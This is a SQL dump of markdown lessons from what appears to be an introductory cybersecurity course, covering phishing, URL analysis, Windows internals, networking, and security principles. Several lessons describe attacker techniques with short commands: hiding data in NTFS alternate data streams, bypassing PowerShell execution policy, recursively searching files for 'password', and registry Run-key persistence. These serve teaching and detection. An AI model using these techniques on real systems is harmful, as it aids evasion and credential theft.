(368, 367, '# 🎣 Phishing Types\n\n## 📝 The Scenario\n**Email 1**: \"Dear Customer, your Netflix is expired. Click here.\"\n**Email 2**: \"Hi Bob, I enjoyed our meeting about Project X in London. Please review the attached contract.\"\n\n## 🕵️‍♂️ Investigation Steps\n\n### Analysis of Email 1 (Bulk Phishing)\n* **Greeting**: Generic (\"Dear Customer\").\n* **Urgency**: High (\"Expired\").\n* **Targeting**: None. Sent to millions.\n\n### Analysis of Email 2 (Spear Phishing)\n* **Greeting**: Personalized (\"Hi Bob\").\n* **Context**: specific (\"Project X\", \"London\").\n* **Source**: The attacker likely researched Bob on LinkedIn.\n* **Danger**: Extremely high. Users trust context.\n\n### 🛡️ Defense\nFor Spear Phishing, you rely on **User Awareness Training**. Technology often misses the context, but a human might spot that \"Project X\" was cancelled last week.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(369, 368, '# 🔗 URL Analysis\n\n## 📝 The Raw Link\n`http://www.paypal.com.secure-login-updates.xyz/login.php`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The Root Domain\n* **Reading**: Read from Right to Left.\n* **TLD**: `.xyz` (Cheap, often malicious).\n* **Domain**: `secure-login-updates.xyz`. This is who really owns the page; nothing to the left of it is verified by anyone.\n* **Subdomains**: `www.paypal.com`. Whoever owns `secure-login-updates.xyz` can create these for free.\n* **Scheme**: plain `http://`, so the \"login\" form would send credentials in cleartext. A lock icon would not make it legitimate either; phishing kits get free TLS certificates too.\n\n### Step 2: Homoglyphs\n* Look closely at: `pаypal.com`.\n* The \'a\' might be a Cyrillic character (IDN Homograph Attack). Use a \"Punycode Converter\" to check.\n* Real: `paypal.com`.\n* Fake: `xn--pypal-4ve.com`.\n\n### Step 3: Sandboxing\n* Paste the URL into **UrlScan.io**.\n* Use a **private/unlisted** scan: public results are searchable, and a phishing URL often carries the victim\'s email address or a one-time token that you would be publishing. Never open the link in your everyday browser.\n* Look at the screenshot. Does it look like the real PayPal login page?\n* If yes, it is a credential harvester.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(370, 369, '# 💯 CVSS Scoring System\n\nUnderstanding the Common Vulnerability Scoring System (v3.1).\n\n## 📝 The Raw Vector\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Attack Vector (AV)\n* **AV:N (Network)**: The vulnerability can be exploited remotely over the internet. (BAD)\n* **AV:P (Physical)**: You need to touch the device (USB). (Less critical).\n\n### Step 2: Complexity & Privileges\n* **AC:L (Low Complexity)**: A script kiddie can do it.\n* **PR:N (None)**: No login required.\n* **UI:N (None)**: No user interaction required.\n\n### Step 3: CIA Impact\n* **C:H (Confidentiality High)**: They steal all data.\n* **I:H (Integrity High)**: They change all data.\n* **A:H (Availability High)**: They delete everything.\n\n### Score\n* **9.8 CRITICAL**. Drop everything and patch this.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(371, 370, '# 🏥 Prioritizing Patches\n\nYou have 10,000 vulnerabilities. You can patch 50. Which ones?\n\n## 📝 The Scenario\n1. **Server A**: Internal Test Server. Vulnerability: Score 10.0 (RCE).\n2. **Server B**: External Web Server. Vulnerability: Score 7.5 (SQLi).\n\n## 🕵️‍♂️ Decision Steps\n\n### Step 1: Exposure\n* **Server B** is reachable from the internet. Attackers are scanning it 24/7.\n* **Server A** is behind a firewall. Attackers need to be inside first.\n\n### Step 2: Exploitability\n* Is there a Metasploit module for the SQLi? Yes.\n* Is the RCE theoretical? Yes.\n\n### Step 3: Business Impact\n* If Web Server goes down, we lose money.\n* If Test Server goes down, devs preserve coffee.\n\n### 🏆 Verdict\n**Patch Server B first**. Context matters more than raw score.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(391, 32, '## Windows File System\n\nUnlike Linux (start at `/`), Windows starts at a Drive Letter, usually `C:`.\n\n### Key Directories\n1.  `C:\\Windows`: The OS core.\n    *   `System32`: Critical DLLs and Executables. (Note: On 64-bit systems, System32 contains 64-bit files. `SysWOW64` contains 32-bit files. Confusing, but legacy.)\n2.  `C:\\Users`: User profiles.\n    *   `C:\\Users\\Bob\\Desktop`, `Downloads`, etc.\n    *   `AppData`: Hidden folder storing app settings (Chrome history, Discord cache). Great for forensics.\n3.  `C:\\Program Files`: Where 64-bit apps live.\n4.  `C:\\Program Files (x86)`: Where 32-bit apps live.\n5.  `C:\\PerfLogs`: Performance logs. Often empty, but sometimes writable by everyone (PrivEsc vector!).\n\n### ADS (Alternate Data Streams)\nA hidden feature of NTFS. A file can have \"sub-files\" hidden behind it.\n*   `echo \"Hidden Data\" > innocent.txt:secret.txt`\n*   `innocent.txt` looks normal. The size shown by `dir` or Explorer does not change.\n*   Hackers use ADS to hide malware inside benign files.\n*   **Detection**: `dir /R` shows streams. Streams are lost when a file is copied to a non-NTFS volume (FAT/exFAT USB stick), so collect evidence with an NTFS-aware tool.\n\n### Permissions (ICACLS)\nWindows uses ACLs (Access Control Lists).\n*   **Full Control**: God mode.\n*   **Modify**: Read/Write/Delete.\n*   **Read & Execute**: Run programs.\n*   **Tool**: `icacls file.txt` (View permissions).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(392, 33, '## User Account Control (UAC)\n\nIntroduced in Vista, UAC is the \"Dimmed Screen\" popup asking \"Do you want to allow this app to make changes?\".\n\n### The Concept\nEven if you are an Administrator, you run with \"Standard\" tokens most of the time. When you need to do a privileged action (like installing software), UAC pauses and asks for the \"Administrator\" token.\n*   **Integrity Levels**:\n    *   **System**: Kernel level. Highest.\n    *   **High**: Administrators (Elevated).\n    *   **Medium**: Standard Users (and Admin non-elevated).\n    *   **Low**: Sandboxed apps (Browser tabs).\n\n### UAC Bypass\nA common hacking technique. Malware tries to assume the High Integrity token without triggering the popup.\n*   **Fodhelper Exploit**: A built-in Windows binary that auto-elevates. Malware hijacks its registry keys to execute code as Admin silently.\n\n### Security Boundaries\nMicrosoft says UAC is **not** a security boundary. It is a convenience feature. If you are already Admin, UAC won\'t stop a sophisticated script.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(393, 34, '## The Windows Registry\n\nThe Registry is a massive hierarchical database storing ALL configuration settings.\n*   Tool: `regedit.exe`.\n\n### The 5 Hives (Root Keys)\n1.  **HKLM (HKEY_LOCAL_MACHINE)**: Settings for the computer (regardless of who is logged in).\n    *   `HKLM\\Software`: Installed programs.\n    *   `HKLM\\System`: Drivers, Services, Boot config.\n2.  **HKCU (HKEY_CURRENT_USER)**: Settings for YOU.\n    *   Wallpaper, theme, saved passwords.\n    *   Actually points to `HKU\\<your SID>`.\n3.  **HKCR (Classes Root)**: File associations (open .pdf with Acrobat).\n4.  **HKU (Users)**: Stores profiles for all users.\n5.  **HKCC (Current Config)**: Hardware profile.\n\n### Persistence in Registry\nHackers love the registry because you can tell Windows to run malware at boot.\n*   **Run Keys**: `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`. Anything here starts when ANY user logs in (writing it needs admin rights).\n*   **HKCU Run**: `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`. Same idea, but only for that user, and any process running as the user can write it without admin rights, which is why commodity malware prefers it.\n*   **RunOnce**: Starts once then deletes itself.\n*   **Services**: `HKLM\\System\\CurrentControlSet\\Services`.\n\n### Forensics Value\n*   **ShimCache / AmCache**: Evidence of program execution (even if deleted).\n*   **ShellBags**: Evidence of which folders were opened.\n*   **USBSTOR**: History of every USB drive ever plugged in.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(394, 35, '## Active Directory (AD)\n\nIf you work in a corporate environment, you use AD. It allows centralized management of users and computers.\n*   **Domain Controller (DC)**: The server running AD (usually Windows Server). It holds the database (`ntds.dit`).\n\n### Core Concepts\n1.  **Domain**: A security boundary. e.g., `corp.local`.\n2.  **Object**: Anything in the domain (User, Computer, Printer, Group).\n3.  **OU (Organizational Unit)**: Folders to organize objects (Sales, HR, IT). You apply policies (GPO) to OUs.\n4.  **Forest**: A collection of Domain Trees. The top level container.\n\n### Authentication: Kerberos vs NTLM\n*   **NTLM**: The old, challenge-response protocol. Vulnerable to \"Pass the Hash\".\n*   **Kerberos**: The standard. Uses \"Tickets\".\n    *   **TGT (Ticket Granting Ticket)**: Proof you are essentially authenticated.\n    *   **TGS (Ticket Granting Service)**: Proof you can access a specific service (like a File Share).\n    *   **Attacks**: Golden Ticket (Forging TGTs), Kerberoasting (Stealing Service Account hashes).\n\n### BloodHound\nA tool used by both Red and Blue teams to visualize AD relationships. It finds \"Attack Paths\" (e.g., User A is Admin on Computer B, where Admin C is logged in...).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(395, 36, '## PowerShell\n\nThe most powerful tool in Windows. It is an Object-Oriented shell.\n(`cmd.exe` is text-based. `powershell.exe` handles Objects).\n\n### Cmdlets (Command-lets)\nThey follow `Verb-Noun` syntax.\n*   `Get-Process`: List processes.\n*   `Stop-Service`: Stop a service.\n*   `New-Item`: Create a file.\n\n### Aliases\nShortcuts for Linux users.\n*   `ls` -> `Get-ChildItem`\n*   `cat` -> `Get-Content`\n*   `wget` -> `Invoke-WebRequest`\n\n### The Pipeline `|`\nPasses objects.\n*   `Get-Process | Sort-Object CPU -Descending | Select-Object -First 5`\n    *   Get all processes.\n    *   Sort them by CPU usage.\n    *   Show only top 5.\n\n### PowerShell for Hackers\n*   **Fileless Malware**: Running a script strictly in memory (RAM). No file touches the disk, so file-scanning Antivirus often misses it. AMSI lets an AV inspect the script text at run time instead, which is why attackers spend effort on AMSI bypasses.\n*   **Execution Policy**: A safety feature, not security.\n    *   `Set-ExecutionPolicy Bypass`: Ignores the restrictions. Even without admin rights, `powershell -ExecutionPolicy Bypass -File x.ps1` skips it for that one process.\n*   **Logging**: Script Block Logging (Event 4104) is the single most useful source for catching malicious PowerShell, because it records the de-obfuscated script as it runs. Pair it with Module Logging (4103) and process-creation logging that captures the command line (Sysmon Event 1 or Security 4688); a script launched through the old PowerShell 2.0 engine, if it is still installed, never produces 4104.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(396, 37, '## Windows Event Logs\n\nThe \"Black Box\" of Windows. Stored in `.evtx` format.\nViewer: `Event Viewer` (`eventvwr.msc`).\n\n### Main Logs\n1.  **Security**: Logins, Privilege use. (Most important for us).\n2.  **System**: Drivers, Service crashes, Reboot.\n3.  **Application**: App crashes (SQL Server logs, etc).\n\n### Critical Event IDs to Memorize\nIf you are a SOC Analyst, tattoo these on your arm.\n\n*   **4624**: Successful Logon.\n    *   Look at **Logon Type**:\n        *   Type 2: Interactive (Keyboard/Local).\n        *   Type 3: Network (SMB/Shared Folder).\n        *   Type 10: RDP (Remote Desktop).\n*   **4625**: Failed Logon. (Brute force indicator).\n*   **4720**: User Created. (Did a hacker add a backdoor user?).\n*   **4672**: Special Privileges Assigned. (Admin logon).\n*   **1102**: Audit Log Cleared. (Hacker trying to cover tracks. HUGE RED FLAG).\n*   **7045**: Service Installed (System Log). (Persistence mechanism).\n\n### Sysmon (System Monitor)\nDefault Windows logs are okay. **Sysmon** (from Sysinternals) is amazing. It logs process creation, network connections, and DNS Lookups.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(397, 38, '## Group Policy (GPO)\n\nGroup Policy Objects allows Admins to push settings to thousands of computers at once.\n*   \"Disable Control Panel for all HR employees.\"\n*   \"Set the wallpaper to company logo.\"\n*   \"Install Chrome on all computers.\"\n\n### Structure\n*   **Computer Configuration**: Applies to the machine (starts at boot).\n*   **User Configuration**: Applies to the user (starts at login).\n\n### The Refresh\nGPO is not instant.\n*   `gpupdate /force`: Command to force a sync with the DC.\n*   Refreshes every 90 minutes by default.\n\n### Abuse\nIf a hacker compromises a Domain Admin account, they can create a malicious GPO to deploy Ransomware to every PC in the company instantly. This is how massive breaches happen.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(398, 39, '## Windows Security Tools\n\nBuilt-in and Sysinternals tools you should know.\n\n### Native Tools\n*   **Task Manager**: Identify resource hogs.\n*   **Resource Monitor**: Detailed network/disk view.\n*   **Windows Defender Firewall**: Controls Inbound/Outbound traffic.\n*   **BitLocker**: Full Disk Encryption. Protects data if laptop is stolen.\n\n### Sysinternals Suite\nA set of free tools actively maintained by Mark Russinovich (Azure CTO).\n1.  **Process Explorer**: \"Task Manager on steroids\". Shows DLLs loaded, handles open, and verifies file signatures (detect malware pretending to be Microsoft).\n2.  **Process Monitor (ProcMon)**: Real-time logs of File System, Registry, and Network activity.\n    *   *Use*: Run malware, watch ProcMon to see what files it creates.\n3.  **Autoruns**: Shows EVERYTHING that starts at boot. (Registry run keys, Scheduled Tasks, Services, Drivers). Best tool for finding persistence.\n4.  **TCPView**: Real-time view of open ports and connections.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(416, 22, '## The OSI Model\n\nThe **Open Systems Interconnection** model describes how data moves from one computer to another. It has 7 Layers.\n\"**P**lease **D**o **N**ot **T**hrow **S**ausage **P**izza **A**way\"\n\n### The Layers (Bottom Up)\n1.  **Physical (Layer 1)**: The cables, fiber optics, and radio waves (WiFi). Bits (0s and 1s).\n    *   *Device*: Hub, Cable.\n    *   *Attack*: Wiretapping, Jamming.\n2.  **Data Link (Layer 2)**: MAC Addresses (Physical usage). Switches operate here.\n    *   *Unit*: Frame.\n    *   *Attack*: ARP Spoofing.\n3.  **Network (Layer 3)**: IP Addresses (Logical usage). Routers operate here.\n    *   *Unit*: Packet.\n    *   *Attack*: Ping Flood.\n4.  **Transport (Layer 4)**: TCP/UDP. Ports. Reliability.\n    *   *Unit*: Segment.\n    *   *Attack*: SYN Flood (DoS).\n5.  **Session (Layer 5)**: Establishing and ending connections (Sessions).\n6.  **Presentation (Layer 6)**: Encryption (SSL/TLS) and formatting (JPEG/ASCII).\n7.  **Application (Layer 7)**: The software you use (HTTP, DNS, SMTP).\n\n### Interaction\nWhen you click a link:\n*   **Encapsulation**: Data goes DOWN the stack (L7 -> L1) adding headers at each layer.\n*   **Decapsulation**: Data goes UP the stack (L1 -> L7) stripping headers.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(417, 23, '## TCP/IP Protocol Suite\n\nThe OSI model is theoretical. TCP/IP is what we actually use.\n\n### TCP (Transmission Control Protocol)\n**Connection-Oriented**. \"Reliable\".\n1.  **The 3-Way Handshake**:\n    *   **SYN** (Client): \"Hi, can we talk?\"\n    *   **SYN-ACK** (Server): \"Yes, I am open.\"\n    *   **ACK** (Client): \"Great, here is data.\"\n2.  **Guarantees Delivery**: If a packet is lost, TCP resends it.\n3.  **Use Case**: Web browsing (HTTP), Email (SMTP), File Transfer (FTP). You don\'t want a missing pixel in your file.\n\n### UDP (User Datagram Protocol)\n**Connection-less**. \"Fire and Forget\".\n1.  No Handshake. No Guarantee.\n2.  The sender just blasts data. If you miss it, tough luck.\n3.  **Use Case**: Streaming Video, VoIP (Voice), DNS.\n    *   *Why?* Speed. If you drop a frame in a video, you don\'t want to pause and wait for it to resend. You just move to the next frame.\n\n### Headers\n*   **TCP Header**: Source Port, Dest Port, Sequence Number, Flags (SYN/ACK/FIN/RST).\n*   **IP Header**: Source IP, Dest IP, TTL (Time To Live).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(418, 24, '## IP Addressing\n\nEvery device needs an IP.\n*   **IPv4**: 32-bit. `192.168.1.1`. (Running out).\n*   **IPv6**: 128-bit. `2001:db8::1`. (The future).\n\n### IPv4 Classes\n*   **Class A**: `1.0.0.0` to `126.x.x.x` (Huge networks).\n*   **Class B**: `128.0.0.0` to `191.x.x.x` (Universities).\n*   **Class C**: `192.0.0.0` to `223.x.x.x` (Small networks).\n\n### Private IPs (RFC 1918)\nThese IPs do not route on the internet. Used for LANs.\n*   `10.0.0.0` - `10.255.255.255`\n*   `172.16.0.0` - `172.31.255.255`\n*   `192.168.0.0` - `192.168.255.255`\n*   **Loopback**: `127.0.0.1` (Localhost).\n\n### Subnetting (CIDR)\nSplitting a network into smaller chunks.\n*   `/24` (Subnet Mask `255.255.255.0`):\n    *   First 3 octets match (`192.168.1.x`).\n    *   Only the last octet changes.\n    *   **Hosts**: 254 usable IPs (`1-254`).\n*   `/16` (Mask `255.255.0.0`):\n    *   **Hosts**: 65,534.\n*   `/32`: A single IP.\n\n**Calculation**:\nNumber of IPs = $2^{(32 - CIDR)}$.\n*   `/30` = $2^2$ = 4 IPs. (Minus Network and Broadcast = 2 usable). Used for Router-to-Router links.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(419, 25, '## Subnetting Cheat Sheet\n\nCalculating subnets is a core skill for certifications (Network+, CCNA).\n\n### The Magic Number Method\nFind the \"Interesting Octet\" (The one where the mask is not 0 or 255).\n\n**Scenario**: Network `192.168.10.0 /26`.\n1.  **Prefix**: /26.\n2.  **Octet**: 26 is in the 4th octet (24 + 2).\n3.  **Mask**: /26 means `11000000` in binary.\n    *   `128 + 64 = 192`. So Mask is `255.255.255.192`.\n4.  **Block Size**: 256 - Mask (192) = **64**.\n\nThis means networks jump by 64.\n*   Subnet 1: `192.168.10.0` - `192.168.10.63`\n*   Subnet 2: `192.168.10.64` - `192.168.10.127`\n*   Subnet 3: `192.168.10.128` - `192.168.10.191`\n*   Subnet 4: `192.168.10.192` - `192.168.10.255`\n\n### Usable Hosts\nFormula: `Block Size - 2`.\n*   Take Subnet 1: Range 0-63.\n*   **0** is Network Address.\n*   **63** is Broadcast Address.\n*   **Usable**: 1-62.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(420, 26, '## DNS (Domain Name System)\n\nDNS turns human names (`google.com`) into computer IPs (`142.250.72.14`).\n\n### The DNS Hierarchy\n1.  **Root Hints (.)**: The 13 root servers worldwide. They know who handles `.com`, `.org`, etc.\n2.  **TLD (Top Level Domain)**: The `.com` servers. They know who handles `google.com`.\n3.  **Authoritative Name Server**: Google\'s actual server. It knows the IP.\n\n### The Resolution Process\nYou type `google.com`.\n1.  **PC**: Checks local cache / HOSTS file.\n2.  **Recursive Resolver (ISP/8.8.8.8)**: \"I don\'t know. I\'ll ask Root.\"\n3.  **Root**: \"I don\'t know, ask .COM server.\"\n4.  **.COM**: \"I don\'t know, ask ns1.google.com.\"\n5.  **ns1.google.com**: \"I know! It is 1.2.3.4.\"\n6.  **Resolver**: Caches it and gives it to PC.\n\n### Record Types\n*   **A**: IPv4.\n*   **AAAA**: IPv6.\n*   **MX**: Mail Server.\n*   **CNAME**: Alias.\n*   **PTR**: Reverse DNS (IP -> Name). Used for email filtering.\n*   **TXT**: Arbitrary text (SPF/DMARC).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(421, 27, '## DHCP and ARP\n\nHow you join a network.\n\n### DHCP (Dynamic Host Configuration Protocol)\nAutomates assigning IPs.\n**The DORA Process**:\n1.  **Discover**: Client shouts (Broadcast): \"IS ANY DHCP SERVER HERE?\"\n2.  **Offer**: Server says: \"I can give you IP `192.168.1.100`\".\n3.  **Request**: Client says: \"I will take it!\"\n4.  **Acknowledge**: Server says: \"It\'s yours for 24 hours.\"\n\n### ARP (Address Resolution Protocol)\nMaps IP (Logical) to MAC (Physical).\n*   Switch knows MACs. Router knows IPs.\n*   When you ping `192.168.1.5` on a LAN:\n    1.  PC checks ARP Table: \"Do I know the MAC for 192.168.1.5?\"\n    2.  If No: Broadcast \"WHO HAS 192.168.1.5? TELL 192.168.1.2\".\n    3.  Device replies \"I have it! My MAC is AA:BB:CC...\".\n    4.  PC sends frame to AA:BB:CC.\n\n**ARP Spoofing (Man in the Middle)**:\nHacker replies \"I am 192.168.1.5!\" to the PC, and \"I am the Router!\" to the Gateway. Now all traffic flows through the Hacker.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(422, 28, '## Common Protocols & Ports\n\nMemorize these.\n\n| Port | Protocol | Service | Secure? |\n|---|---|---|---|\n| **20/21** | FTP | File Transfer | No (Cleartext) |\n| **22** | SSH | Secure Shell (Remote Linux) | **Yes** |\n| **23** | Telnet | Teletype Network (Remote CLI) | No (Cleartext) |\n| **25** | SMTP | Email Sending | No (Use 587) |\n| **53** | DNS | Domain Name System | No (DNSSEC exists) |\n| **80** | HTTP | Web Traffic | No |\n| **443** | HTTPS | Encrypted Web Traffic | **Yes** (TLS) |\n| **110** | POP3 | Email Retrieval | No |\n| **143** | IMAP | Email Retrieval | No |\n| **3389** | RDP | Remote Desktop (Windows) | Yes |\n| **445** | SMB | Windows File Share | No (v1/v2 vulnerable) |\n\n### Traffic Analysis\n*   **Cleartext** protocols (HTTP, Telnet, FTP) show passwords in Wireshark.\n*   **Encrypted** protocols (HTTPS, SSH) show garbage characters.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(424, 30, '# Scenario: The Suspicious Login\n\n**Background**: You are a SOC Analyst. You received an alert about \"Cleartext Credentials\" on the network. You open the PCAP file in Wireshark.\n\n## Investigation Data\n*   **Packet 12**: Protocol: HTTP. Source: 192.168.1.105. Dest: 104.21.55.2.\n*   **Info**: POST /login.php HTTP/1.1\n*   **Packet 12 Details**:\n    *   Form item: \"username\" = \"admin\"\n    *   Form item: \"password\" = \"SuperSecret123\"\n\n## Analysis\n1.  The user logged into a website using **HTTP**, not HTTPS.\n2.  Because it was HTTP, the data was sent in **Plaintext**.\n3.  Anyone on the same WiFi could have captured this packet and stolen the credentials.\n\n## Mitigation\n*   Always enforce **HTTPS** (TLS/SSL).\n*   Use certificate pinning.\n*   Educate users to look for the \"Padlock\" icon.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'),
(425, 31, '# Final Module Quiz\n\nReview the key concepts from this module:\n*   OSI Layers & TCP/IP\n*   IP Addressing & Subnets\n*   Common Protocols (SSH, HTTP, DNS)\n*   Packet Analysis Basics\n\nYou are now ready to tackle real-world networking scenarios.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'),
(434, 40, '## The CIA Triad\n\nThe cornerstone of Information Security. Every decision balances these three.\n\n1.  **Confidentiality**: Keeping secrets secret.\n    *   **Goal**: Only authorized people can read data.\n    *   **Tools**: Encryption (AES), Access Control Lists (ACLs), Steganography.\n    *   **Failure**: Data Breach (Equifax).\n2.  **Integrity**: Trusting the data.\n    *   **Goal**: Data has not been tampered with.\n    *   **Tools**: Hashing (SHA256), Digital Signatures.\n    *   **Failure**: An attacker changing a bank transfer from $10 to $10,000.\n3.  **Availability**: Accessing the data.\n    *   **Goal**: Systems are up and running.\n    *   **Tools**: Redundancy (RAID), Backups, Load Balancers.\n    *   **Failure**: DDOS Attack, Ransomware (Encrypting files makes them unavailable).\n\n### The Balancing Act\nYou cannot have 100% of all three.\n*   To make a system perfectly Confidential (unplug internet), you hurt Availability.\n*   To make it perfectly Available (Open wifi), you hurt Confidentiality.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(435, 41, '## Authentication (AuthN)\n\n\"Who are you?\"\n\n### The Three Factors\n1.  **Type 1: Something you Know**: Password, PIN, Mother\'s Maiden Name.\n    *   *Weakness*: Can be guessed or phished.\n2.  **Type 2: Something you Have**: Smart Card, Phone (SMS Code), YubiKey.\n    *   *Weakness*: Can be stolen or lost.\n3.  **Type 3: Something you Are**: Biometrics (Fingerprint, Retina, FaceID).\n    *   *Weakness*: Privacy concerns. You can\'t reset your face if it is compromised.\n\n### MFA (Multi-Factor Authentication)\nCombining two *different* factors.\n*   Password + PIN = **NOT MFA** (Both are Type 1).\n*   Password + SMS Code = **MFA** (Type 1 + Type 2).\n*   **Impact**: MFA stops 99.9% of automated account takeovers.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(436, 42, '## Authorization (AuthZ)\n\n\"What are you allowed to do?\"\n(AuthN happens first, then AuthZ).\n\n### Models\n1.  **DAC (Discretionary Access Control)**:\n    *   The owner decides. (Windows/Linux file permissions).\n    *   \"I created this file, I let Bob read it.\"\n2.  **MAC (Mandatory Access Control)**:\n    *   The System decides based on labels. (Military).\n    *   \"User is SECRET. File is TOP SECRET. User cannot read.\"\n3.  **RBAC (Role Based Access Control)**:\n    *   Access based on job function. (Corporate).\n    *   \"Bob is in HR Group. HR Group can read Payroll.\" (Best for scaling).\n4.  **ABAC (Attribute Based)**:\n    *   \"User can read file IF location=Office AND time=9am-5pm.\" (Zero Trust).', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(437, 43, '## Accounting (Non-Repudiation)\n\n\"What did you do?\"\nTracking user actions to ensure accountability.\n\n### Logging\n*   **Who**: user `jsmith`.\n*   **What**: Accessed `salary_database.db`.\n*   **When**: `2024-12-25 04:00:00`.\n*   **Where**: From IP `10.5.5.5`.\n\n### Non-Repudiation\nProof that someone did something so they cannot deny it later.\n*   **Digital Signatures**: If I sign an email with my Private Key, I cannot claim \"I didn\'t write that\", because only I have the key.\n*   **Audit Trails**: Logs sent to a central SIEM that users cannot delete.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(438, 44, '## Encryption Basics\n\nTurning \"Plaintext\" into \"Ciphertext\".\n\n### Symmetric Encryption (Shared Key)\n*   **Concept**: Same key locks and unlocks.\n*   **Algorithms**: AES (Advanced Encryption Standard), DES (Legacy), 3DES.\n*   **Pros**: Fast. Good for large data (Hard Drives, Zip files).\n*   **Cons**: Key Distribution problem. How do I send you the key securely?\n\n### Asymmetric Encryption (Public Key)\n*   **Concept**: Key Pair.\n    *   **Public Key**: You give to everyone. Encrypts data.\n    *   **Private Key**: You keep secret. Decrypts data.\n*   **Algorithms**: RSA, ECC (Elliptic Curve).\n*   **Pros**: Secure key exchange.\n*   **Cons**: Slow. CPU intensive.\n\n### Hybrid Encryption (HTTPS/TLS)\nWe use Asymmetric to exchange the key, then Symmetric to transfer the data. Best of both worlds.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(439, 45, '## Hashing vs Encryption\n\nThey are often confused but are opposite concepts.\n\n| Feature | Encryption | Hashing |\n|---|---|---|\n| **Reversible?** | **YES** (with key). | **NO** (One-way). |\n| **Purpose** | Confidentiality. | Integrity. |\n| **Output Size** | Variable (Depends on input). | Fixed (e.g., 256 bits). |\n| **Examples** | AES, RSA. | SHA-256, MD5. |\n\n### Hashing Use Cases\n1.  **Password Storage**: Never save passwords as text. Save the hash (salted, using a dedicated password-hashing function). When user logs in, hash their input and compare it to the database.\n2.  **File Integrity**: Download a file. Check its MD5 (or better, SHA-256; MD5 is no longer collision-resistant). If it matches the hash published on the website, the file was not corrupted or tampered with in transit.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(440, 46, '## Defense in Depth (Layered Security)\n\nDo not rely on one wall. If the wall fails, you lose. Use multiple layers.\nThe \"Onion\" approach.\n\n### The Layers\n1.  **Policies/User**: Training, Strong Passwords.\n2.  **Physical**: Locks, Cameras, Guards.\n3.  **Perimeter**: Firewall, DMZ.\n4.  **Network**: VLANs, NAC (Network Access Control).\n5.  **Host**: Antivirus, EDR, Patching.\n6.  **Application**: Secure Code, Input Validation.\n7.  **Data**: Encryption, ACLs.\n\n### Example\nA hacker wants your database.\n1.  **Firewall** blocks their port scan. (Layer 3).\n2.  They Phish a user. **Email Filter** misses it.\n3.  User clicks link. **EDR** detects the malware download and blocks it. (Layer 5).\n**Defense in Depth worked**.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(441, 47, '# Final Module Quiz\n\nProve your mastery of Security Principles.\nTopics:\n*   CIA Triad (Confidentiality, Integrity, Availability)\n*   AAA (AuthN, AuthZ, Accounting)\n*   Encryption & Hashing\n*   Defense in Depth\n\nGood luck!', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-26 20:58:02'),
(447, 48, '## Windows CLI Navigation\n\nThe Command Prompt (`cmd.exe`) is the legacy shell, but still essential.\n\n### Directories\n*   `dir`: List files (Like `ls` in Linux).\n*   `cd`: Change directory.\n    *   `cd Desktop`\n    *   `cd ..` (Up one level).\n    *   `cd \\` (Back to the root of the current drive, e.g. C:\\).\n*   `d:`: Switch to D drive. (Just type the letter).\n\n### Files\n*   `type file.txt`: Read a file (Like `cat`).\n*   `del file.txt`: Delete.\n*   `copy file.txt backup.txt`: Copy.\n*   `move file.txt folder`: Move.\n*   `ren file.txt new.txt`: Rename.\n\n### Tips\n*   **Tab Completion**: Type `cd Des` and hit Tab.\n*   **cls**: Clear screen.\n*   **help [command]**: `help dir`.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(448, 49, '## Advanced File Reading\n\n### Searching\n*   `findstr`: The Windows grep.\n    *   `findstr \"password\" config.txt`: Search for string.\n    *   `findstr /S /I \"password\" *.txt`: Recursive (/S) and Case-Insensitive (/I) search in all text files.\n\n### Redirection\n*   `>`: Overwrite. `echo hello > file.txt`.\n*   `>>`: Append. `echo world >> file.txt`.\n*   `|`: Pipe. `type log.txt | findstr \"error\"`.\n\n### Attributes\nFiles can be Hidden.\n*   `attrib`: Show attributes.\n*   `attrib +h file.txt`: Hide it.\n*   `attrib -h file.txt`: Unhide it.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
